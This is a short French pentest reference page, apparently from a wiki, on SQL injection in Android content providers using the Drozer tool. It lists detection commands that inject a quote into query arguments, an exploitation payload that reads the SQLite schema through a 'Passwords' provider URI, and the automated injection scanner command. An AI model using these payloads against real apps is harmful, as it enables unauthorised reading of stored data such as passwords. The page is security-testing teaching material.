Injections SQL (Android)

Manuelle dans content provider

Détection

dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --selection "'"

et

dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --projection "'"

Exploitation

dz> run app.provider.query content://com.example.targetapp.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Automatique

dz> run scanner.provider.injection -a com.example.targetapp

PrécédentOutil Drozer SuivantPath traversal (Android)

Dernière mise à jour il y a 2 ans

Cet article vous a-t-il été utile ?